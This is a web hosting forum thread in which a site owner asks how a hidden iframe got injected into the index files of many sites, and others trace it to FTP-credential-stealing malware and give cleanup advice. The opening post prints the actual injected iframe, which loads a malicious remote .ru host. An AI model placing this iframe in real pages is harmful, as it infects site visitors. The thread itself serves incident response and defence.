Page 1 of 2 12 LastLast
Results 1 to 25 of 32
  1. #1
    Join Date
    Jul 2004
    Location
    UK
    Posts
    47

    iframe injection attack

    Hi, I need help understanding the iframe injection attack and how it is performed by the hacker, and furthermore how it affects different accounts on my VPS - The reason I need to know is below:

    I got an email from Google saying that they added one of my sites to their list of ‘bad ware sites’, the email was as follows:

    Subject: Malware notification regarding *************.com
    Date: 01/09/2009 19:07:08 GMT Daylight Time
    From: noreply@google.com
    Reply To:
    To: abuse@*************.com, admin@*************.com, administrator@*************.com, contact@*************.com, info@*************.com, postmaster@*************.com, webmaster@*************.com
    Sent from the Internet (Details)

    Dear site owner or webmaster of *************.com,

    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

    Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

    http://************* .com/
    http://www.************* .com/

    Here is a link to a sample warning page:
    http://www.google.com/interstitial?u...*********.com/

    We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

    1) the site was compromised
    2) the site doesn't monitor for malicious user-contributed content
    3) the site displays content from an ad network that has a malicious advertiser


    If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
    StopBadware.org - Tips for Cleaning & Securing Your Website

    Once you've secured your site, you can request that the warning be removed by visiting
    My site's been hacked - Webmasters/Site owners Help
    and requesting a review. If your site is no longer harmful to users, we will remove the warning.

    Sincerely,
    Google Search Quality Team

    This site did not contain spyware (that I knew of) so I did an audit by data modified via FTP to see if any files had been hacked, checking the recently modified files I discovered they did contain an iframe:

    Do not visit the URL (as it contains a virus)
    <iframe src="http://u7n.ru:8080/index.php" width=177 height=158 style="visibility: hidden"></iframe>
    I removed that above code from one of my sites, then proceeded to check the others; all contain that above code or a similar code (different URL), all index.(xxxx) files have been inserted with the above JavaScript on affected accounts.

    What I need to know is how did they get in? and how do I prevent this from happening again, because if I put these files back from backups - they will just be open to exploit again.

    I contacted my host to ask how the hackers did it and how to prevent it from happening again, they said:

    We are sorry to hear that you are facing this problem. This kind of attack is known as iframe injection attack which only effects the index.xxx files. This is caused either due to weak FTP passwords or due to some vulnerability in the scripts. As you said the passwords are strong so the later one can be the cause in your case. Still I recommend you to reset all the passwords of the accounts and then audit them.

    I am certain they don't have my password as I have roboform and never manually enter passwords or use my hosting passwords elsewhere, besides my hosting passwords are 'strong'. (but I will be changing them all incase)

    So I suspect they may have inserted the code via a vulnerability in one of the scripts.

    However if one script was vulnerable say for instance (vBulletin or phpbb) on one account/site on the VPS:

    1. Then how did they modify and insert code into other sites/accounts on the VPS that were not using the script?
    2. Why were some accounts not affected by the ‘iframe injection attack’?
    3. What is the best way to find out exactly where the vulnerability is and how the hacker did what they did?
    4. Any other security advice or ways to 'lockdown' a VPS?


    I really need help understanding this as I have a VPS with around 21 accounts (my sites), all using different passwords and scripts; I’m not host savvy at all.

    Just removing this simple insertion into each index file is an enormous task due to the amount of accounts and index files, not to mention my visitors getting viruses:|

    The only good thing that happened was Google informed me of the attack and very quickly (ie 1 day) - The price to pay, Google labeling my sites as badware:td:.

  2. #2
    Join Date
    Nov 2002
    Posts
    62
    Search!

    I've replied to numerous threads in here...

    Same issue

  3. #3
    Join Date
    Jul 2007
    Posts
    2,051
    Much has been said and discussed on this topic, however, there is no concrete way found to detect the exact cause. I have a customer who has done everything in the textbooks and still his websites are getting infected and the server is not vulnerable as there are no websites other than his websites getting infected. How do we find out how the iframe got injected in the pages?
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  4. #4
    Join Date
    Jul 2004
    Location
    UK
    Posts
    47
    I have researched the iframe injection attack on the web and discovered that a virus name kriptik (sp) infects pc's, then sends the FTP login info (from the ftp program) to a remote machine to access the sites and then injects the code.

    I was aware that a few days ago I had a major infection on my PC, it was that bad that I could not even get windows to load even in safe mode, eventually I had to repair windows XP 3 times. Then I spent two days finding the spyware, just got clean today.

    So when I found my sites hacked I was extremely unhappy as it happened twice, in reality it happened once!

    So as careful as I am with passwords, they still got them due to a PC virus.


    Whilst typing this all sites that I cleared are now reinfected again, more notices from Google about badware, so now I know the cause I can get to work and stop this dead.

    Thanks for your replies.

  5. #5
    Join Date
    Jul 2007
    Posts
    2,051
    I have found an excellent solution against Gumblar attacks. Visit http://www.oxio.net/anti_gumblar/. Can't wait to try it.
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  6. #6
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    222
    The three character domain followed by either .ru, .kw, .cn or any other TLDs, followed by a port designation (:8080) have been the result of compromised FTP credentials.

    photoshopfreak is correct. It is a series of viruses implanted on various PCs (and some Macs we've seen) that does little more than steal FTP credentials.

    It works in a variety of ways.

    First, it knows the files and their default locations of various FTP software, FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

    The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password. Which is why strong passwords aren't a defense in this case.

    Second, the virus installs a keyboard logger. This variant is relatively new because earlier this year the hackers saw that everyone was telling people not to save their FTP username and passwords, so the hackers started installing keyboard loggers for those who type their passwords in each time. Same follow-through, the stolen information is sent to a server that infects the web site.

    Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, send it to a server and ... (you get the idea).

    Fourth, and is the most recent, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This latest variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

    The best way I've found to combat this is by following these steps:

    Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.

    Step 2: Login to your control panel at your web hosting provider's site and change your FTP password. Write it down at this point DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.

    Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea who's PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.

    Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes you'll have to type in the new password, but hopefully you're already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website not just index files or just html files. Check every file on your website even .js and .css files.

    Step 5: Change your FTP passwords again.

    Step 6: If you've been blacklisted by Google, login to your Google Webmaster Tools and verify your site if you haven't already, then request a review. You'll have to click on your site, then across the top you'll see in your dashboard a label in dark background that says, "This site may be distributing malware. More Details (which is a link). Click on that and request a review. If your site is clean, Google should bless you with removing that warning from SERPs.

    Then you should have that issue again.

    This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on PC with FTP access to the infected website.

    If you have further questions regarding this, post here and I'll try to help.

  7. #7
    - Clamscan on your server can help you to find which files are already infected.
    - There are few mod security rules at gotroot that prevent these iframe attacks to a great extent
    - Maintain daily+weekly backups for your accounts, as the only possible way to recover from an iframe attack is backups.
    - Secure your local computer with an antivirus - I use Avira Antivir on Windows, a good one till now ^L^
    - Do not store any passwords - particularly ftp on your local computer.

    if you have already cleaned and secured your site, try contacting stopbadware.
    Windows VPS | Linux Hybrid Server | 99.9% Uptime
    http://www.odishahosting.com ( USA DC)
    http://www.odishahosting.in ( INDIA DC)

  8. #8
    Join Date
    Jul 2007
    Posts
    2,051
    Quote Originally Posted by WeWatch View Post
    The three character domain followed by either .ru, .kw, .cn or any other TLDs, followed by a port designation (:8080) have been the result of compromised FTP credentials.

    photoshopfreak is correct. It is a series of viruses implanted on various PCs (and some Macs we've seen) that does little more than steal FTP credentials.

    It works in a variety of ways.

    First, it knows the files and their default locations of various FTP software, FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

    The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password. Which is why strong passwords aren't a defense in this case.

    Second, the virus installs a keyboard logger. This variant is relatively new because earlier this year the hackers saw that everyone was telling people not to save their FTP username and passwords, so the hackers started installing keyboard loggers for those who type their passwords in each time. Same follow-through, the stolen information is sent to a server that infects the web site.

    Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, send it to a server and ... (you get the idea).

    Fourth, and is the most recent, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This latest variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

    The best way I've found to combat this is by following these steps:

    Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.

    Step 2: Login to your control panel at your web hosting provider's site and change your FTP password. Write it down at this point DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.

    Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea who's PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.

    Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes you'll have to type in the new password, but hopefully you're already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website not just index files or just html files. Check every file on your website even .js and .css files.

    Step 5: Change your FTP passwords again.

    Step 6: If you've been blacklisted by Google, login to your Google Webmaster Tools and verify your site if you haven't already, then request a review. You'll have to click on your site, then across the top you'll see in your dashboard a label in dark background that says, "This site may be distributing malware. More Details (which is a link). Click on that and request a review. If your site is clean, Google should bless you with removing that warning from SERPs.

    Then you should have that issue again.

    This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on PC with FTP access to the infected website.

    If you have further questions regarding this, post here and I'll try to help.
    I think this is the best explanation provided to understand and prevent the iframe attacks problem.
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  9. #9
    Join Date
    Sep 2007
    Posts
    369

    *

    Quote Originally Posted by photoshopfreak View Post

    Whilst typing this all sites that I cleared are now reinfected again, more notices from Google about badware, so now I know the cause I can get to work and stop this dead.
    Also install some good antivirus and setup hourly or once a day scan to your web directories and send email report to you so you can check the details accordingly and you know on time on which site or file got infected rather than google launch malware warning on your website.
    Thanks,
    Noman
    noman@linuxonsupport.com
    O Canada, we stand on guard for thee

  10. #10
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,007
    While you clean up your server (again), you can disable ftp or change all user passwords, and make them prove they are clean before allowing ftp access again. Looking through logs should allow you to determine which ftp accounts are compromised.
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  11. #11
    Join Date
    Jul 2004
    Location
    UK
    Posts
    47
    All threats already killed dead

  12. #12
    Join Date
    Jul 2007
    Posts
    2,051
    The real issue while scanning the website directories inside the server is that the infected files get quarantined instead of cleaning and it is difficult to find the exact file for a website from a bunch of quarantined files. Customers, usually, don't keep their websites' backups. Is there a solution which will just remove the iframe entry from the infected file?
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  13. #13
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,007
    The iframe injections aren't a virus (althought they are caused by a users workstation being compromised by a virusm, more often than not), it's just code uploaded by the stolen ftp credentials, so AV really is useless anyway. About the only thing you can do is manually clean up the files, but most important, prevent them from happening in the first place by correct directory permissions (in the case of scripts being compromised) and sftp vs ftp. If you must use FTP, then you will have to watch users, and do something pro-active to warn end users of the threat, and require or strongly suggest they use a good AV.
    Aside from mail servers, AV on a server is usually not a good idea for just the reason you stated (in the case of real viruses).
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  14. #14
    Join Date
    Jul 2007
    Posts
    2,051
    One thing I have noticed in a few websites which are frequently being infected is that the permissions are correct. Also, I have suPHP installed which does not allow chmod 777. However, I think the stolen FTP credentials can still be used to infect the files. Please correct me if I am wrong.
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  15. #15
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,007
    Correct, the most common cause of the iframe injections lately are infected client computers...the virus steals the ftp credentials, then uploads the iframe files directly to their server, usually infecting the most common index files. So you are right, in this case, server permissions don't matter. They do matter on the variants that take advantage of 777 upload directories, so both are really important to prevent the injections.
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  16. #16
    Join Date
    Sep 2007
    Posts
    369

    *

    Quote Originally Posted by prashant1979 View Post
    The real issue while scanning the website directories inside the server is that the infected files get quarantined instead of cleaning and it is difficult to find the exact file for a website from a bunch of quarantined files. Customers, usually, don't keep their websites' backups. Is there a solution which will just remove the iframe entry from the infected file?
    Hi Prashant,

    It will not quarantine you need to use the software accordingly and display only infected files, Need to write script properly so it stores relavant files properly and just display. Then you will get the list of file those are having problem, easily can be restored from backup or remove relevant tags.

    True clients dont keep their backup buts it good if some will tell them and guide them properly or good hosting company always take backup whether client will take by their own or not. When client site got malware then they will understand the meaning of backup, Why Backup is important. I always keep my client backup on different co-location so whenever something happen it will take me hardly one hour to restore relvant things from backups. Result client will happy as well.

    I have work alot on this topic and did alot research may be you will clean some files via some way, but the infection way is going intellient day by day, so it's not easy to cleanup automatically, might be due to this some one lose client original site data. This iframe will penetrate time by time and day initally it start from one to two page, If virus scanning is properly setup so system admins of relevant company get notify on time and hence they will check the relevant logs and other necessary things, it will save iframe penetration on other pages and we got the problem cause where, why, when problem occurs.
    Thanks,
    Noman
    noman@linuxonsupport.com
    O Canada, we stand on guard for thee

  17. #17
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    222
    The other issue here is that many people are running to companies that will perform a vulnerability scan of your website. Some of these services will find a variety of vulnerabilities, some will not.

    The point here is that no vulnerability scanner in the world will find the real entry point of this exploit. It doesn't and it can't find the point of entry because the hacker is using a valid FTP account.

    So while many people are running around chasing down "holes" in their website, the hackers keep hacking their website because the vulnerability scanner just won't find the hole.

    You have to think of every point of entry, even stolen passwords.

    It's an endless circle at times.

  18. #18
    Join Date
    Jun 2008
    Location
    India
    Posts
    130
    yes thats right...Iframes comes commonly by taking the advantage of 777 permission directories and files. you can find them easily by running following commands... go to your public_html

    for linux.

    find ./ -type f -perm 777
    find ./ -type d -perm 777

  19. #19
    Join Date
    Jul 2007
    Posts
    2,051
    Doesn't suPHP disable execution of scripts with the permission 777?
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  20. #20
    From a couple of week my web site is under iframe attacks i have tried all the solution,Reinstall my own pc,change all passwords, Clean all Files of my web site but it is attacked again and again.

    Then i change the names o files index.php and login.php and found that now files dont contain iframe

    But after 5 days i found that now all other files are modified and contain iframe code in them. I m sick of all this and could not find soln which could save my files
    Please help me with reasonable responses

  21. #21
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,007
    Quote Originally Posted by Saima View Post
    From a couple of week my web site is under iframe attacks i have tried all the solution,Reinstall my own pc,change all passwords, Clean all Files of my web site but it is attacked again and again.

    Then i change the names o files index.php and login.php and found that now files dont contain iframe

    But after 5 days i found that now all other files are modified and contain iframe code in them. I m sick of all this and could not find soln which could save my files
    Please help me with reasonable responses
    If there are other users that upload to this server via FTP, they could be infected.
    If that is not the case, then try to think of any other computers you may have FTPed in with...if there are none, I would then suspect some script that has 777 perms set on some directory.
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  22. #22
    One of the best idea is to change your FTP password to more critical and stronger.

  23. #23
    Join Date
    Jul 2007
    Posts
    2,051
    Will FTP over TLS/SSL work to prevent the FTP passwords from being sniffed by the trojans?
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  24. #24
    Yes., As per my knowledge, it will work.

  25. #25
    Join Date
    Nov 2001
    Location
    The South
    Posts
    5,408
    Quote Originally Posted by prashant1979 View Post
    Will FTP over TLS/SSL work to prevent the FTP passwords from being sniffed by the trojans?
    Won't do jack if it's a keylogger doing the sniffing. Also there are still sniffs that can happen between the time you type your password, and the time in which that password is encrypted and sent over the wire. So no it won't stop it but yes it will help.
    Gary Harris - the artist formerly known as Dixiesys
    resident grumpy redneck

Page 1 of 2 12 LastLast

Similar Threads

  1. How to prevent iframe injection attack?
    By xoleno in forum Hosting Security and Technology
    Replies: 20
    Last Post: 04-17-2010, 05:54 PM
  2. iframe Injection Issues
    By Indy in forum Hosting Security and Technology
    Replies: 13
    Last Post: 02-26-2010, 01:12 PM
  3. Iframe Injection
    By mali in forum Hosting Security and Technology
    Replies: 12
    Last Post: 11-18-2008, 10:14 AM
  4. iframe injection
    By kamyana in forum Hosting Security and Technology
    Replies: 9
    Last Post: 06-10-2007, 11:24 AM
  5. severe <iframe> injection problem please help
    By jxnms in forum Hosting Security and Technology
    Replies: 12
    Last Post: 12-01-2006, 07:27 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •